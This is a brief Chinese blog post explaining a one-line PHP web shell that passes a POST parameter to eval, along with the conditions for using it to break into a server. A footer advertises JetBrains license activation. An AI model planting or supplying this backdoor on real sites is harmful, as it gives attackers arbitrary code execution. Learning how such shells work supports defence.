大家好,又见面了,我是你们的朋友全栈君。
<?php @eval($_POST['attack']) ?>
@ 表示后面即使执行错误,也不报错
eval() 函数表示括号内的语句字符串什么的全都当做代码执行
$_POST[‘attack’] 表示从页面中获得attack这个参数值
只要攻击者满足这三条添加,就能实现入侵:
(1)木马上传成功,未被杀;
(2)知道木马的路径在哪;
(3)上传的木马能正常运行。
发布者:全栈程序员-用户IM,转载请注明出处:https://javaforall.cn/143202.html原文链接:https://javaforall.cn
【正版授权,激活自己账号】: Jetbrains全家桶Ide使用,1年售后保障,每天仅需1毛
【官方授权 正版激活】: 官方授权 正版激活 支持Jetbrains家族下所有IDE 使用个人JB账号...